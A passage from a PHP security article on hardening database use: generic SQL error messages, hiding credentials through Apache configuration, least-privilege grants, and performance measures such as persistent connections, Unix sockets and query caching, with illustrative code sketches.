to determine how to attempt a better SQL injection attack.
In fact, the SQL error may have been caused by an
inadvertent SQL injection. Hence, the generated error
becomes a literal guide to devising trickier queries.
The best way to avoid revealing too much information
is to devise a very simple SQL error handler to handle SQL
failures:
function sql_failure_handler($query, $error) {
    $msg = htmlspecialchars("Failed Query: {$query}<br>"
        . "SQL Error: {$error}");
    error_log($msg, 3, "/home/site/logs/sql_error_log");
    if (defined('debug')) {
        return $msg;
    }
    return "Requested page is temporarily unavailable, "
        . "please try again later.";
}
mysql_query($query)
    or die(sql_failure_handler($query, mysql_error()));
The handler function takes the query and error message
generated by the database and creates an error string
based on that information. The error string is passed
through htmlspecialchars() to ensure that none of the
characters in the string are rendered as HTML, and the
string is appended to a log file.
The next step depends on whether the script is running in
debug mode. If in debug mode, the error message is
returned and is likely displayed on-screen for the
developer to read. In production, though, the specific
message is replaced with a generic message, which hides
the root cause of the problem from the visitor.
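To try the two code paths without a database, the handler above can be reworked so that the log path and the debug flag are passed in. This is only a sketch of one possible variation: the function name sql_failure_message() and its parameters are hypothetical, and it differs from the handler above in two ways, ending each log entry with a newline (error_log() in mode 3 does not add one) and escaping only the text sent to the browser.

```php
<?php
// Hypothetical variant of the handler above: the log path and debug flag
// are parameters so both paths can be exercised without a database.
function sql_failure_message($query, $error, $logFile, $debug = false)
{
    $detail = "Failed Query: {$query} | SQL Error: {$error}";

    // Mode 3 appends to the given file; the newline must be added by hand.
    error_log($detail . "\n", 3, $logFile);

    if ($debug) {
        // Escape only the copy that is displayed in the browser.
        return htmlspecialchars($detail);
    }
    return "Requested page is temporarily unavailable, "
        . "please try again later.";
}

// Throwaway log file for the demonstration.
$log = tempnam(sys_get_temp_dir(), 'sql');

$public  = sql_failure_message("SELECT * FROM t WHERE id='", "syntax error", $log);
$private = sql_failure_message("SELECT <b>", "syntax error", $log, true);

echo $public, "\n";
echo $private, "\n";
```

The visitor-facing string never contains the query, while the log file receives one line per failure.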
Authentication Data Storage
Perhaps the final issue to consider when working with
databases is how to store your application’s database
credentials: the login and password that grant access
to the database. Most applications use a small PHP
configuration script to assign a login name and password
to variables. This configuration file, more often than
not (at least on shared hosts), is left world-readable
to provide the web server user access to the file. But
world-readable means just that: anyone on the same
system or an exploited script can read the file and steal
the authentication information stored within. Worse,
many applications place this file inside web-readable
directories and give it a non-PHP extension; .inc is a
popular choice. Since .inc is typically not configured to
be interpreted as a PHP script, the web server sends
such a file as plain text for all to see.
One solution to this problem uses the web server’s
own facilities, such as .htaccess in Apache, to deny
access to certain files. As an example, this directive
denies access to all files that end (notice the $) with
the string .inc.
<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>
Alternatively, you can make PHP treat .inc files as scripts
or simply change the extension of your configuration
files to .php or, better yet, .inc.php, which denotes
that the file is an include file.
However, renaming files may not always be the safest
option, especially if the configuration files have some
code aside from variable initialization in the main scope.
The ideal and simplest solution is not to keep
configuration and non-script files inside web
server-accessible directories.
That still leaves world-readable files vulnerable to
exploit by local users.
One seemingly effective solution is to encrypt the
sensitive data. Database authentication credentials could
be stored in encrypted form, and only the applications
that know the secret key can decode them. But this use
of encryption only makes theft slightly more difficult
and merely shifts the problem instead of eliminating it.
The secret key necessary to decrypt the credentials must
still be accessible by PHP scripts running under the web
server user, meaning that the key must remain world-
readable. Back to square one…
A proper solution must ensure that other users on
the system have no way of seeing authentication data.
Fortunately, the Apache web server provides just such
a mechanism. The Apache configuration file, httpd.conf,
can include arbitrary intermediate configuration files
during start-up while Apache is still running as root.
Since root can read any file, you can place sensitive
information in a file in your home directory and change
it to mode 0600, so only you and the superuser can read
and write the file.
<VirtualHost ilia.ws>
Include /home/ilia/sql.cnf
</VirtualHost>
If you use the Include mechanism, be sure that your
file is only loaded for a certain VirtualHost or a certain
directory to prevent the data from being available to
other hosts on the system.
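Because the whole scheme rests on the included file being mode 0600, it can be worth checking the permission bits from a small maintenance script. The sketch below assumes a POSIX filesystem; the helper name is_exposed_to_other_users() is hypothetical, and a throwaway temporary file stands in for the real credentials file.

```php
<?php
// Hypothetical helper: true if group or others have any access to $path.
function is_exposed_to_other_users($path)
{
    // Drop any cached stat data so a recent chmod() is seen.
    clearstatcache(true, $path);
    // 0077 masks the group (070) and others (007) permission bits.
    return (fileperms($path) & 0077) !== 0;
}

// Demonstration on a throwaway file rather than a real credentials file.
$file = tempnam(sys_get_temp_dir(), 'cnf');

chmod($file, 0644);
$before = is_exposed_to_other_users($file); // readable by group and others

chmod($file, 0600);
$after = is_exposed_to_other_users($file);  // owner only

var_dump($before, $after);
unlink($file);
```

On a POSIX system the first check reports the file as exposed and the second does not.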
The content of the configuration file is a series of
SetEnv lines, defining all of the authentication parameters
necessary to establish a database connection.
SetEnv DB_LOGIN "login"
SetEnv DB_PASSWD "password"
SetEnv DB_DB "my_database"
SetEnv DB_HOST "127.0.0.1"
After Apache starts, these environment variables are
accessible to the PHP script via the $_SERVER super-global
or the getenv() function if $_SERVER is unavailable.
echo $_SERVER['DB_LOGIN']; // login
echo getenv("DB_LOGIN"); // login
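The two lookups can be folded into one small function that tries $_SERVER first and falls back to getenv(). This is a sketch under stated assumptions: db_setting() is a hypothetical name, and the two assignments near the bottom merely simulate what Apache's SetEnv lines would provide so the example runs from the command line.

```php
<?php
// Hypothetical helper: look in $_SERVER first, then fall back to getenv().
function db_setting($name, $default = null)
{
    if (isset($_SERVER[$name])) {
        return $_SERVER[$name];
    }
    $value = getenv($name);
    // getenv() returns false when the variable is not set.
    return $value === false ? $default : $value;
}

// Simulation only: stand-ins for values that SetEnv would supply.
$_SERVER['DB_HOST'] = '127.0.0.1';
putenv('DB_LOGIN=login');

echo db_setting('DB_HOST'), "\n";  // found in $_SERVER
echo db_setting('DB_LOGIN'), "\n"; // found via getenv()
var_dump(db_setting('DB_MISSING_EXAMPLE'));
```

Returning a default for missing names lets the caller fail with a clear message instead of attempting a connection with empty credentials.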
An even better variant of this trick is to hide the
connection parameters altogether, even from the script
that needs them. Use PHP’s ini directives to specify the
default authentication information for the database
extension. These directives can also be set inside the
hidden Apache configuration file.
php_admin_value mysql.default_host "127.0.0.1"
php_admin_value mysql.default_user "login"
php_admin_value mysql.default_password "password"
Now, mysql_connect() works without any arguments, as
the missing values are taken from PHP ini settings. The
only information remaining exposed would be the name
of the database.
Because the application is not aware of the database
settings, it consequently cannot disclose them through a
bug or a backdoor, unless code injection is possible. In fact,
you can enforce that only an ini-based authentication
procedure is used by enabling SQL safe mode in PHP
via the sql.safe_mode directive. PHP then rejects any
database connection attempts that use anything other
than ini values for specifying authentication data.
This approach does have one weakness in older
versions of PHP: up until PHP 4.3.5, there was a bug in
the code that leaked ini settings from one virtual host
to another. Under certain conditions, this bug could be
triggered by a user, effectively providing other users on
the system with a way to see the ini values of other
users.
If you’re using an older version of PHP, stick to the
environment variables or upgrade to a newer version
of PHP, which is a very good idea anyway, since older
releases include many other security problems.
Database Permissions
The last database security tip has nothing to do with PHP
per se, but is sound advice that can be applied to every
component in your system. In general, grant the fewest
privileges possible.
For example, if a user only requires read-access to
the database, don’t permit the user to execute UPDATE
or INSERT queries. Or more realistically, limit write
access to those tables that are expected to change,
perhaps the session table and the user accounts table.
By limiting what a user can do, you can detect, track,
and defang many SQL injection attacks. Limiting access
at the database level is supplemental: you should use it
in addition to all of the database security mechanisms
listed in this chapter.
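As a rough illustration of the read-mostly setup described above, the following sketch generates MySQL GRANT statements from a map of tables to privileges. Everything named here is an assumption made for the example: the build_grants() helper, the account, and the sessions and users tables. The inputs are treated as trusted constants written by the administrator, never as user input.

```php
<?php
// Hypothetical helper: build MySQL GRANT statements from a map of
// table => privileges. All names are illustrative, trusted constants.
function build_grants($db, $account, array $privileges)
{
    $sql = array();
    foreach ($privileges as $table => $privs) {
        $sql[] = sprintf(
            'GRANT %s ON %s.%s TO %s',
            implode(', ', $privs),
            $db,
            $table,
            $account
        );
    }
    return $sql;
}

$grants = build_grants('my_database', "'login'@'127.0.0.1'", array(
    '*'        => array('SELECT'),                     // read everything
    'sessions' => array('INSERT', 'UPDATE', 'DELETE'), // tables expected
    'users'    => array('INSERT', 'UPDATE'),           // to change
));

echo implode(";\n", $grants), ";\n";
```

With grants like these, an injected UPDATE against any other table is refused by the database itself, whatever the PHP code lets through.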
Maintaining Performance
Speed isn’t usually considered a security measure, but
subverting your application’s performance is as damaging
as any other exploit. As was demonstrated by the LIKE
attack, where % was injected to make a query very slow,
enough costly iterations against the database could
saturate the server and prevent further connections.
Unoptimized queries present the same risk: if the attacker
spots inefficiencies, your server can be exhausted and
rendered useless just the same.
To prevent database overloading, there are a few
simple rules to keep in mind.
Only retrieve the data you need and nothing more.
Many developers take the “*” shortcut and fetch all
columns, which may result in a lot of data, especially
when joining multiple tables. More data means more
information to retrieve, more memory for the database’s
temporary buffer for sorting, more time to transmit the
results to PHP, and more memory and time to make the
results available to your PHP application. In some cases,
with large amounts of data, database sorting must be
done in a temporary file on disk instead of in memory,
adding to the overall time to process a request. Again,
only retrieve the data you need, and name the columns to
minimize size further.
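One way to make naming columns a habit is to build the column list from a fixed whitelist, so that neither “*” nor an unexpected column can slip into the query. The sketch below is one possible approach; build_select(), the messages table, and its column names are hypothetical.

```php
<?php
// Hypothetical helper: build a SELECT that names its columns, keeping
// only the requested columns that appear in a fixed whitelist.
function build_select($table, array $wanted, array $allowed)
{
    $columns = array_values(array_intersect($wanted, $allowed));
    if (!$columns) {
        throw new InvalidArgumentException('No permitted columns requested');
    }
    return 'SELECT ' . implode(', ', $columns) . ' FROM ' . $table;
}

// Assumed schema, for illustration only.
$allowed = array('id', 'subject', 'posted_at');

// 'body' is not whitelisted, so it is dropped from the column list.
$sql = build_select('messages', array('id', 'subject', 'body'), $allowed);
echo $sql, "\n"; // SELECT id, subject FROM messages
```

Large columns can then be left off the whitelist for list pages and fetched only where they are actually displayed.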
To further accelerate a query, try using unbuffered
queries that retrieve query results a small portion at a
time. However, unbuffered queries must be used carefully:
only one result cursor is active at any time, limiting you
to working with one query at a time. (And in the case of
MySQL, you cannot even perform INSERT, UPDATE, and
other queries until all results from the result cursor have
been fetched.)
To work with a database, PHP must establish a
connection to it, which in some cases can be a rather
expensive operation, especially when working with complex
systems like Oracle, PostgreSQL, MSSQL, and so on.
One trick that speeds up the connection process is to
make a database connection persistent, which allows
the database handle to remain valid even after the
script is terminated. If a connection is persistent, each
subsequent connection request from the same web server
process reuses the connection rather than creating it
anew.
The code below creates a persistent MySQL database
connection via the mysql_pconnect() function, which is
syntactically identical to the regular mysql_connect()
function.
mysql_pconnect("host", "login", "passwd");
Other databases typically offer a persistent connection
variant, some as simple as adding the prefix “p” to the
word “connect”.
Anytime PHP tries to establish a persistent connection,
it first looks for an existing connection with the same
authentication values; if such a connection is available,
PHP returns that handle instead of making a new one.
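The lookup can be pictured as a per-process table keyed by the authentication values. The following is a conceptual sketch only, not PHP's internal implementation: pooled_connect() is a hypothetical function, a static array stands in for the pool that lives as long as the web server process, and a closure stands in for the real connection call.

```php
<?php
// Conceptual sketch only: NOT how PHP implements persistent connections.
// $connect is any callable that opens a connection.
function pooled_connect($host, $login, $passwd, $connect)
{
    static $pool = array(); // survives between calls, like a process-wide pool
    $key = md5($host . "\0" . $login . "\0" . $passwd);
    if (!isset($pool[$key])) {
        // No connection with these authentication values yet: open one.
        $pool[$key] = call_user_func($connect, $host, $login, $passwd);
    }
    return $pool[$key];
}

// Fake connection factory that counts how often it is really called.
$opened = 0;
$fake = function ($host, $login, $passwd) use (&$opened) {
    $opened++;
    return (object) array('host' => $host, 'login' => $login);
};

$a = pooled_connect('host', 'login', 'passwd', $fake);
$b = pooled_connect('host', 'login', 'passwd', $fake); // same values: reused
$c = pooled_connect('host', 'other', 'passwd', $fake); // new login: new handle

var_dump($a === $b, $a === $c, $opened);
```

Three requests result in only two real connections, because the second request matches the authentication values of the first.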
Words of Caution
Persistent connections are not without drawbacks. For
example, in PHP, connection pooling is done on a per-
process basis rather than per-web server, giving every
web-server process its own connection pool. So, 50 Apache
processes result in 50 open database connections. If the
database is not configured to allow at least that many
connections, further connection requests are rejected,
breaking your web pages.
In many cases, the database runs on the same machine
as the web server, which allows data transmission to be
optimized. Rather than using the slow and bulky TCP/IP,
your application can use Unix Domain Sockets (UDS), the
second fastest medium for Inter Process Communication
(IPC). By switching to UDS, you can significantly improve
the data transfer rates between the web server and the
database.
To switch to UDS, change the host parameter of the
connection. For example, in MySQL, set the host to a
colon followed by the path to the socket.
mysql_connect(":/tmp/mysql.sock", "login", "passwd");
pg_connect("host=/tmp user=login password=passwd");
In PostgreSQL, where there’s no need for a special host
identifier, simply set the host parameter to the directory
where the socket can be found and enjoy the added
performance.
Query Caching
In some instances, a query is as fast as it can be, yet
still takes significant time to execute. If you cannot
throw hardware at the problem (which has its limits as
well), try to use the query cache. A query cache retains
a query’s results for some period of time, short-circuiting
the need to recreate the results from scratch each time
the same query runs.
Each time there’s a request for a page, the cache is
checked; if the cache is empty, if the cached results have
expired, or if the cache was invalidated (say, by an
UPDATE or an INSERT), the query executes. Otherwise,
the results saved in the cache are returned, saving time
and effort.
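The check-then-execute logic just described can be sketched in a few lines of PHP. Note the assumptions: this is an application-side illustration with hypothetical class and method names, whereas a database's built-in query cache does the same work inside the server and needs no code at all. The current time is passed in explicitly so that expiry can be shown without waiting.

```php
<?php
// Conceptual sketch of an application-side result cache. Class and
// method names are hypothetical.
class QueryCache
{
    private $entries = array();
    private $ttl;

    public function __construct($ttlSeconds)
    {
        $this->ttl = $ttlSeconds;
    }

    // Return cached rows for $sql, or run $fetch and cache its result.
    public function get($sql, $fetch, $now = null)
    {
        $now = $now === null ? time() : $now;
        $key = md5($sql);
        if (isset($this->entries[$key])
            && $this->entries[$key]['expires'] > $now) {
            return $this->entries[$key]['rows']; // hit: no query executed
        }
        $rows = call_user_func($fetch, $sql);    // empty or expired
        $this->entries[$key] = array(
            'rows'    => $rows,
            'expires' => $now + $this->ttl,
        );
        return $rows;
    }

    // Call after an INSERT or UPDATE that changes the cached data.
    public function invalidate()
    {
        $this->entries = array();
    }
}

// Fake query runner that counts real executions.
$runs = 0;
$fetch = function ($sql) use (&$runs) {
    $runs++;
    return array(array('n' => $runs));
};

$cache = new QueryCache(60);
$cache->get('SELECT 1', $fetch, 1000); // empty cache: executes
$cache->get('SELECT 1', $fetch, 1030); // still fresh: served from cache
$cache->get('SELECT 1', $fetch, 1061); // expired: executes again
$cache->invalidate();
$cache->get('SELECT 1', $fetch, 1062); // invalidated: executes again
echo $runs, "\n"; // 3
```

Four requests cost three executions here; on a busy page with a sensible lifetime, the ratio is usually far more favorable.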
ILIA ALSHANETSKY is the principal of Advanced Internet
Designs Inc., which specializes in security auditing,
performance analysis and application development. He is
the author of FUDforum, a highly popular, Open Source
bulletin board, focused on providing the maximum
functionality at the highest levels of security and
performance. Ilia is a core PHP Developer, an active
member of PHP’s QA team, and was the Release Master for
the PHP 4.3.x series. He has authored and co-authored a
number of extensions, most notably SHMOP, PDO, SQLite and
GD, and is responsible for a large number of bug fixes and
performance tweaks in the language. A prolific lecturer
and writer, Ilia can be found speaking at international
conferences. He is frequently published in print and
online magazines on a variety of PHP topics, and is also
the author of an upcoming book on PHP security.